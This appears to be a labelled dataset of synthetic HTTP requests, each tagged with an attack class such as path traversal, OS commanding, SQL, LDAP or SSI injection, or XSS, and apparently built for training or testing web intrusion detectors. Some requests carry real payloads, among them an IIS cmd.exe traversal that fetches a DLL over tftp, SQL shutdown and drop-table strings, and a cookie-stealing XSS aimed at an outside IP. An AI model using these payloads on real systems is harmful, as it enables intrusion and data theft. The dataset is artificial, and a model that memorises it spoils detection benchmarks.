If-Range: Sun, 23 Nov 08 17:49:29 GMT
Max-Forwards: 7345
MIME-Version: 7.5
Pragma: s='brmbddpi'
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest nonce
Range: 3473-351,462906-
Referer: http://www.aleeeaCu.fr/5mntl/1t2o/shbo.nsf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.7; 6w-nT; rv:7.8.2) Gecko/97519486
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: ttpdeu/3.1 138.106.153.152, 4.3 22.237.198.104
Transfer-Encoding: deflate
Upgrade: hi11/1.2
Warning: 407 143.65.197.47 "assaq" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43193
Start - Id: 46114
class: PathTransversal
PUT /tN1tpm2/zdO4QtibK/qvZ2PG/s8RMt2LvbWZsJB0l/aly.Fn19u/uuoltEfngaSvOmsaEnt/adhytipusduw7hm9L1e/8mJ3m/etedstfltnk7T0ykeda/elase5ooiebytvttamht.msf? HTTP/1.0
Content-Length: 296
Content-Language: edaiEu
Content-Encoding: deflate
Content-Location: http://sgendb.net/7tlsdWnH/nrte8/tsciih.pdf
Content-MD5: MG1kZHpJY2VpRGVsU3VuNA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Dec 06 18:32:37 GMT
Last-Modified: Thu, 01 Oct 09 10:32:20 GMT
Host: www.ltAeASbi.ch
Connection: ehRppkr
Accept: text/xml;q=0.3
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate, compress, deflate, compress
Accept-Language: 2ec-el8;q=0.4, erol-ehNtr, iFgdna-cndat;q=0.0, lf1m1Hk-utrs;q=0.6
Cache-Control: no-cache
Client-ip: 128.211.32.12
Cookie: jnwlt=oeanhb7lz;7nnncodAovu=rypglmpdo0d;Wrlsaieo=ewz@r;u3hbrau=632285;YGupdateNjyGP=hnaaddchz9;slqaljssst7iows=k~7\and
Cookie2: $Version="6"
Date: Thu, 23 Jun 05 10:42:29 UTC
ETag: W/"oSiqqhx9H424PVN"
Expect: oA66net
From: sneTb@ntoa.org
If-Modified-Since: Mon, 08 Feb 10 04:49:56 CET
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "vOC6dqi_Niksxo.@ZY7"
If-None-Match: *
If-Range: Thu, 02 Aug 07 15:24:27 CET
Max-Forwards: 083
MIME-Version: 6.9
Pragma: irQe='3RdEdl'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Digest nonce
Range: -03018,-4474
Referer: /5ncwvRtt/eduhiotr.rar
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: iiesweot (w5aG4q7U5I; 3UYQTG7la; ukPOF8)
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rg3pahcliirZ=node8ansarwsnhps&RQ3d8=7128582&_drop6knode5C8=ue5Tt018orercxres&nuaarmer1ymlr3r= &ea6aeahhMi9pz4a=q/2o;&pt=../../../../var/log/access_log%00.html&x2gadrntdlvH=30&w9muoethqudnxh=nhs&f8=rRerytrhfveO&tctebe51seH=ulyo2swaii&sEat=orNed&ds@0G3wv88Yq=e2@Tkuk&oeg9=042902

End - Id: 46114
Start - Id: 36455
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 91.134.8.138
Connection: keep-alive
Accept: video/quicktime;q=0.3, application/postscript;q=0.7
Accept-Charset: *
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=205
Client-ip: 41.52.219.46
Cookie: 4ou=0719;omo8t8twQ=roectoj
Cookie2: $Version="27"
Date: Wed, 27 May 09 08:50:13 CET
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Wed, 18 Jun 08 04:46:57 CET
If-Match: "ZTBHPBxxA45tV_z"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: Sat, 27 Oct 07 23:14:31 CET
Max-Forwards: 599
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: /5osguloe/MeaR/nmuexss/pnne.pdf
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (compatible; e0Hkif; Open BSD i586; nenyrajisb)
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x6469
Via: 0.6 135.28.73.107:897
Transfer-Encoding: compress
Upgrade: fet/9.1, iro/2.9
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36455
Start - Id: 43734
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: www.hrUilloo.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.4, gzip, gzip;q=0.5
Accept-Language: hid8B-Ly;q=0.7
Cache-Control: min-fresh=4667
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="346"
Date: Sun, 02 Mar 08 07:32:12 UTC
ETag: W/"G4AsBzyc4BCrx9quAQV"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Tue, 01 Nov 05 14:28:55 CET
If-Unmodified-Since: Sun, 09 Nov 08 20:05:01 GMT
If-Match: *
If-None-Match: "9FSPI_Hn2L7hEd9v6"
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 224
MIME-Version: 0.1
Pragma: hsesoWeK='ush'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bnZzYWFFc2w6YWR1Y2R0cw==
Range: -1,-82
Referer: /fecacm/e0sec/x1U5/nieiadrn/imYgnr9.rar
TE: gzip,chunked;q=0.9,gzip;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/0.2 (compatible; MSIE 8.3; Solaris; R4oyewn; ixasdln2)
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: 2.6 www.eathg.js:2, HTTP/4.6 146.178.5.12
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 94311514979203
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43734
Start - Id: 46250
class: PathTransversal
GET /kWT--pY3/fBDX52w9B_ARl-/lz.html?n3fcsraboffo2l=rh%3C&a68=uUjCTXR3b6P&ii=L%27%3C&_m1HNv=515&aoOuhgejNrli=07675&n3hgXYunionr_=slhifoaotnP&9rt-PmobjectZs=lMK7&or5Do2h=2879&e6eaate=rqtAspobeoros7asad&zDS=%2Fetc%2Fhttpd%2Fhttpd.conf&rof=893221251&hW8oocuraireo=83642&rprcrErsteymia=oQKoDq9&eir2qdananxl6ao=h&hSei=r6j_N02a73J9 HTTP/1.0
Host: 39.71.96.162
Connection: close
Accept: text/*;q=0.4
Accept-Charset: x-mac-ce;q=0.5, iso-10646-ucs-2;q=0.2, iso-8859-8;q=0.5
Accept-Encoding: identity
Accept-Language: tr7t-j5roIbA, frpnvwec-ttaI;q=0.7, e-vnehnql;q=0.1, Nliglc-eu;q=0.9
Cache-Control: max-stale
Client-ip: 207.164.142.103
Cookie: 0eHbnE7o6=olphpreieimg
Cookie2: $Version="772"
Date: Fri, 30 May 08 12:46:47 GMT
ETag: "N7Ppg6kTnN1vCFx0Lc"
Expect: salf=glfs9od
From: iervv@usohuics.gov
If-Modified-Since: Tue, 12 Apr 05 08:13:01 UTC
If-Unmodified-Since: Tue, 19 Apr 05 13:35:03 UTC
If-Match: "HLXMtC0SFhJ_0vM"
If-None-Match: "QeK9EsS8kgnHixgR"
If-Range: "QpC6NCb43Hnxt7j3"
Max-Forwards: 4037
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Basic dG9tYzphaG52
Range: 5263-
Referer: /meIhey/xoto/swao/utobu/nieho.mpg
TE: deflate;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.1 (Windows; U; WinNT 8.6; af-ao; rv:7.0.2) Gecko/35054605
UA-CPU: 68000
UA-Disp: 2962,786,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0134x6320
Via: FTP/9.3 230.63.39.148, 7.0 97.126.93.175, FTP/3.9 www.o2ho.css:662
Transfer-Encoding: identity
Upgrade: roeie/1.4
Warning: 233 www.yens9.gif "cesksyo" 
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46250
Start - Id: 41794
class: SqlInjection
GET /m.Q.php4?ztE=%27%3B++shutdown--&in=nbiduethGuyend5ere&txsheEqs=400034&eest8rfcO=vo0sG&Ro=sixTxSzYwZaz&3nqtCrtodrat=lidupjte&sowoulRRrtl=%5BmetaH&cfenyZgeha2=ioze6 HTTP/1.1
Host: 8.133.207.109
Connection: eicdsvh
Accept: */*
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: a-t, ha-oamS, en2f-T
Cache-Control: max-stale
Client-ip: 218.44.126.244
Cookie: ensstiaav=af8NUYejY8;qroeti=onNON-I;dn=n eLioNdohe4p;zNt=giyh@G@Bvk;7hs=Smrc;
Cookie2: $Version="3"
Date: Thu, 15 Apr 04 19:03:15 CET
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: onotkol
From: hwhheI@8isu.ch
If-Modified-Since: Fri, 10 Aug 07 07:03:30 CET
If-Unmodified-Since: Tue, 30 Jan 07 01:15:39 CET
If-Match: *
If-None-Match: "ULyeBhS_17z3tmEq1"
If-Range: *
Max-Forwards: 725
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: Basic aHhyaGJvMHU6ZW1hcnN1OU4=
Range: 82059-
Referer: http://www.bytbtesz.gov/Tb9t3aen/otsiygim/eeirq/tiGye.shtml
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/9.0 (compatible; Konqueror/6.7; Linux i386; ief6; outynt)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: gzip
Upgrade: heensd/7.9, eiv/7.2, s6i/1.4, aaxlid/6.5, ga4l/7.2
Warning: 426 159.202.208.161 "deuobinrttskRs" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 17122995024045170296
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41794
Start - Id: 35288
class: SqlInjection
GET /tp@F4@C/bSBgQdb5.Mv/aljbn6Ex3tGk/uQEi8fdE0ZeG8.jpeg?_KHQPy1=%27%3B+++++drop+table++4rewn50us&eohosrh=eje&wioeerltta=9533 HTTP/1.1
Host: www.dhimgelAm.de:27307
Connection: close
Accept: audio/*, audio/basic;q=0.3
Accept-Charset: macintosh, koi8-r;q=0.8, euc-jp;q=0.4, windows-1258;q=0.3
Accept-Encoding: compress;q=0.3, gzip;q=0.8, gzip, identity;q=0.7, deflate;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 57.47.12.14
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Sun, 24 Jun 07 22:03:40 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: tomlS4
From: g1swIsn@rorentof.uk
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Thu, 23 Jun 05 05:11:49 CET
If-Match: *
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Fri, 27 Feb 09 22:12:19 CET
Max-Forwards: 0346
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="pYar"
Authorization: NTLM cnRydTI3cWhkZXByUm51c3R3dG5yZXRucm5pbW41cm9OZ2Q1cXhvU3R5ZWs=
Range: 930-456,2355-
Referer: /lrmnhoaa/Lazhdsms/erowli/keiteed/erlwfnn.php3
TE: gzip;q=0.4,chunked;q=0.1
Trailer: Warning
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 3.7; fc-pI; rv:3.8.0) Gecko/20725308
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: HTTP/4.5 49.34.229.149
Transfer-Encoding: saih3d; nnlSm=0canoe
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35288
Start - Id: 38126
class: LdapInjection
GET /na/e4kab708m/sh8eeatoscren/a5ervtlteaee37pp/eRtqdrPDrircaeiaaxi/1lvIy/tUtOrBf/xT@2UCBXDOM0/pymVFr0hiXG1ck0/bhSfnoetumjN2oFen3ue.htm?6syoylgthaULeK=r2s7&imceaeyeek=ieh5giRdejee3ee&rt6se=j&gfoa58ehaos=Nerrtnc&3oieaze6n=1ea&cwhm9=u0C&gtayrteyuFip=%29%28++%7C%28displayName%3Dhad*%29++%28name+++%3D++had*%29%28mail%3Dhad*++++%29&enesece=asyrareogem HTTP/1.0
Host: www.hgO5sD.st:80
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: max-age=9
Client-ip: 76.39.81.250
Cookie: fp9McEBB5=aQ5YOl;71ttSes=titXDf;idq=680;zesx3f9neatat=1
Cookie2: $Version="5"
Date: Mon, 27 Sep 04 20:06:19 GMT
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Thu, 30 Aug 07 03:30:15 UTC
If-Unmodified-Since: Sat, 07 Jan 06 20:21:37 GMT
If-Match: "dLrYpuFPvup1yG6B@n"
If-None-Match: *
If-Range: Wed, 18 Mar 09 23:25:26 CET
Max-Forwards: 92
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: http://ttsIry.gov/enie/ov3hrenr.jpg
TE: chunked,chunked;q=0.3
Trailer: From
User-Agent: Mozilla/4.4 (X11; U; Open BSD i586 8.6; eh-at; rv:5.7.7) Gecko/82884960
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: 3.4 www.tldoTlna.jpg, HTTP/4.6 133.110.171.24
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 380 www.gtcrerT.html:4591 "ksmndhegEt2od" "Sat, 04 Oct 08 01:21:24 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38126
Start - Id: 42755
class: SqlInjection
POST /mvh3i./9s/iNtW@UY0XQPK@Gs.html? HTTP/1.1
Content-Length: 78
Content-Language: oao4r,mjit
Content-Encoding: deflate
Content-Location: /g9oi9kW/oh6dI/rmOniiew.cfm
Content-MD5: YmFqYWVoa0Fjd2V0cmF0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jun 08 22:02:21 UTC
Last-Modified: Sun, 11 Jun 06 21:01:40 CET
Host: www.aaeemntfcm.com:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=03952
Client-ip: 85.78.89.184
Cookie: ZAJFG6m1gQ=8n;mgsEae2;KchildD_Im=igSv;6ssidgniostt='   )  UN/**/ION    ALL  SEL/**/ECT  'jemny',5,14,'naa',9    FROM   aEoesyd3T WHERE    (  '' =  '
Cookie2: $Version="25"
Date: Tue, 26 Jun 07 10:25:53 CET
ETag: W/"tn7EPi_w6_IXb2y9I1B"
Expect: 100-continue
From: tnehuje@osoicnh.gov
If-Modified-Since: Thu, 24 Nov 05 19:22:54 CET
If-Unmodified-Since: Thu, 24 Mar 05 12:40:25 GMT
If-Match: "EgR4IT072wjrI8HGDSE"
If-None-Match: "ZhwwuRxElFCJpbFE"
If-Range: *
Max-Forwards: 98
MIME-Version: 2.3
Pragma: tn5Hpit='tSci'
Proxy-Authorization: Digest cnonce="xeouomh"
Authorization: Digest username="etasheo"
Referer: /xIdlbr/Oeccpn/vinosnec.php4
TE: gzip,gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: onEn9nlnhr (i1EfE8Hp; eGtjqOmA; aw0wC5.E)
UA-CPU: Sparc
UA-Disp: 511,399,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9435x2586
Via: FTP/6.9 236.13.73.17, HTTP/5.2 91.252.12.156:94407
Transfer-Encoding: identity
Upgrade: ot4vpa/8.5
Warning: 200 www.ierlebee.tiff "chcalstx9prp1n0pZc" 
X-Forwarded-For: 65.152.204.230
----: --------------------------

aurr=nPh45lifnlPnf&xa7xycuonwaegiq=281195803&eolnirs=her2nje3yla&au0lsdgntg= m

End - Id: 42755
Start - Id: 46970
class: XSS
GET /a0g6/iZJr5E8aCzIv/tham4usaeWcr/eVKeJex4vBfjfEbXUv/ieOuhGqUKnFjS5/xrGrVYea.php4?dTm=%3Cdiv++++onmouseover+%3D+%22+++%5Bwindow.open%28%27http%3A%2F%2F183.149.3.178%2Fmandas.mspx%27%2Bdocument.cookie%29%3B%5D%22+%3E&TcghheAuis9=93&y3rl5=66139216&waaln=le&rapnsreyeOmf=m&tisshaoiimadRl=xc HTTP/1.0
Host: www.eot8sm.org:039
Connection: dq5lnr
Accept: video/*;q=0.7, image/png, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: amo18tEp-tA9R;q=0.1, r-msnroi
Cache-Control: no-cache
Client-ip: 62.241.33.36
Cookie: uhs4et8nofl=504;autoexecmFmho=n2;odoywqe=;s5a?5;J6sDea=s@dwOtirftmp sour;_EidoTIo-=4rt;entnteabneto=07323071
Date: Fri, 23 Sep 05 06:25:10 UTC
Expect: 100-continue
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Thu, 24 Jul 08 23:12:51 GMT
If-Match: "EbMTWcwjZ6s_Ybm5"
Max-Forwards: 2087
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: Digest response="Dff145616EaD7C755E0Efd5BcA5bd806"
Referer: /aeegpce/ng0s/shtg9gz/mAtaoeZ/sognyt.swf
TE: trailers
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 5.5; ae-lQ; rv:9.4.3) Gecko/10638235
Via: 4.2 www.l1oIjreu.css:406, 3.2 187.219.246.141, 2.0 www.osskscEi.htm
Transfer-Encoding: deflate
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46970
Start - Id: 39308
class: SSI
GET /ivKZj.mNTD014PI62/Cosntf0skrDht2/oOnZi8gmQE8tGfA/oROeh4mHh/g3Qxogx-Uqc-c/rlijih2wenau7oe/s6Z41EBMJYPuvLG/87DOEvI.jpeg?eerrr=00977989&eD4vP6=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&s3ide67auktes=9&tbReu=asysitrfkmyRwfmet&rformQjXN=t&6IpX=bsHs%3C HTTP/1.1
Host: www.phfe56es.org
Connection: close
Accept: image/gif;q=0.4
Accept-Charset: windows-1255;q=0.0, x-mac-roman;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 179.91.166.107
Cookie: OLGdeleted=essvntn;OvCVFPTXexecin=ocscript-v;ehs=ttl
Cookie2: $Version="7"
Date: Mon, 11 May 09 14:25:19 CET
ETag: "pD0ccILhMH5ownzMZB"
Expect: oeyvtn
From: l2mr@a6ldiT.ch
If-Modified-Since: Tue, 28 Jun 05 05:13:25 GMT
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Jun 07 08:00:33 CET
Max-Forwards: 822
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic YTNzRmljdDpuaWVobHk0cA==
Authorization: gZEtif rrhftl=igoft4in
Range: -7615,124-
Referer: /nw57v3gw/nlefhn/a7Aadatt/IEwelth.php4
TE: gzip;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/9.3 (Windows; U; WinNT 7.2; Be-91; rv:5.6.8) Gecko/13527353
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: deflate
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 559061405127813998
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39308
Start - Id: 36156
class: PathTransversal
GET /5ieeAeni4C/s63ZNH35dCj/nLy899n/nQxwZGFaKFt/sJFgOWYmBQt6/wrheNrrlgnmtvo/1y3rcpwinnt6C57dVGR.jsp?rtnas=t&M9XO8replaceQpSR=faxoenrIldaefi&dsirofteXar=g&Fvxt-tstdinOM=aerul&c2nhseo=%2Bt&ddp=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fma%2Felorllie%2Fic%2Flatensll.pl&z@.KRI-=unh&gls3atuaifDeNa=56&nodeA9Qv4L=etosfg%3Djtg+ade&azsa=ec&ht=waT%7CmetadnnloaaRod&ZhjoqnahS=ai1jgiesr&@access_logrHuAnetcatI9=lmsZe3etDeiKa&eusfAE5m=rTgNGj5pio8f HTTP/1.1
Host: www.gali.uk
Connection: tTt6l
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: identity;q=0.9, gzip, gzip;q=0.2
Accept-Language: *
Cache-Control: min-fresh=7
Date: Mon, 17 Jan 05 17:05:09 UTC
ETag: ".7NANGl.RLIY.vDMt.Ei"
From: rmee3leS@lenn.de
If-Modified-Since: Fri, 09 May 08 14:46:43 GMT
If-Unmodified-Since: Thu, 05 Apr 07 22:10:32 GMT
If-Match: "ElzUMg79vsWjlYT-UWa"
If-None-Match: *
Max-Forwards: 6
Pragma: emug=edieona
Authorization: alNdRr eonogUyo=tHrIx9
Referer: http://jlle.fr/ehTbyeue/zl1ni/tef9sy20.php
User-Agent: twmtolbtc/8.5.8
UA-Color: color16
Via: 6ss/6.0 www.bccr.tiff
Transfer-Encoding: identity
X-Forwarded-For: 11.225.138.134
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36156
Start - Id: 42640
class: SqlInjection
GET /n4/morn/4zr0/i7_Fz8qOBR8da_kMPfnl/6oIEyjAcyI3tM4y3E/rT0s/ujdtLMFW/eYeGZ/hnaQizTmlxs4enpotrsg/UTW@5X@2OLH.htm?hsclbtec=sdiahtHeA82tleNu&rOcuiEa0kh6e=%27+++%2B+%28+++SELECT+++++TOP++1++dttftnyo+FROM++++fugw0i%29++++%2B+++%27 HTTP/1.1
Host: www.lbine3eo4c.it:80
Connection: abaa
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.2, deflate, compress
Accept-Language: lTTf-8heec;q=0.0, dr8o0-pnawee, Ib1ca2E9-re
Cache-Control: lr='eatc'
Client-ip: 67.157.110.65
Cookie: trlCesuqwdiee=FD6hhihSNdiInltn;agQofH=o0 r;aaeonyxlSlthmu=31398;Cs4h8up=1698210;tloanin=074257627
Cookie2: $Version="7"
Date: Tue, 19 Jun 07 16:45:28 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Sun, 18 Jul 04 07:45:50 UTC
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "t3ZZn9T7aZU5gRt"
If-Range: "vVRJst@F7XtESRAgqj_8"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: gipv='yTha4fle'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: gubga cAtOapm=polma
Range: 72326-9838
Referer: /bnzet/rzoor/iedsnrpn/eoeed4iu/tnha.php4
TE: trailers
Trailer: If-Range
User-Agent: hliRR3e/8.7.8.1
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.4 166.219.211.234
Transfer-Encoding: gzip
Upgrade: hoefdi/5.8, afmr09/0.6, fgj/9.1, mds/0.8, 8sseh/8.0
Warning: 581 www.sne7zbS.jpg "ltfyPl" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42640
Start - Id: 40633
class: SSI
GET /cTW5./vthRhiaz7NDsek/e8i/t5SeyO3_IShz@Ab-/ls/il1mi8luinonuc/iWy1-ejEzW@1U/lINWPxn.HlikeW.jpeg?eponaa0fkgpwe9=35650398&8a3hjhsruh=ITuiak&lEroie6=t%5Dw&t4tbyrehmN7itht=X%40eteea&ltGtcJhusao=psKwdw&nxGRwnliud=p2lee6feiiisit6&kveblNus77i=%3C%21--+%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&bnrof=iea HTTP/1.0
Host: www.edlheldeL.com:80
Connection: soso
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: usId-dx8;q=0.2, 8asChS-a;q=0.6
Cache-Control: max-age=1
Client-ip: 90.139.110.154
Cookie: onAnmiR=l7jNzjqc7
Cookie2: $Version="00"
Date: Wed, 13 Oct 04 15:08:22 GMT
ETag: "W8veuxEiZqMK.Jmsxe"
Expect: 100-continue
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Tue, 07 Jul 09 20:53:10 CET
If-Unmodified-Since: Tue, 08 May 07 04:08:43 UTC
If-Match: "1Gj4TWa1@Ts-kXp7j"
If-None-Match: "Y_DawOze9QOPFzXa"
If-Range: "lXyBqmAI8Diln-23NTX"
Max-Forwards: 780
MIME-Version: 0.9
Pragma: dSimH='iton'
Proxy-Authorization: sazlte neuhunTs=Hdeoarhe
Authorization: NTLM cmZvYXBmcmE4Y3dhcGhpbmlyamJFb3RzcmFhbjlsbGlTbXA=
Range: -916,268-761609,54-38396
Referer: /eSt7/awtnUt/fitxB4nl/9prksod/eGrnkdo.sh
TE: gzip
Trailer: From
User-Agent: Mozilla/3.5 (Machintosh; U; Mac OS X 7.0; ul-je; rv:3.7.9) Gecko/46533990
UA-CPU: Sparc
UA-Disp: 959,926,32
UA-OS: Windows 95
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
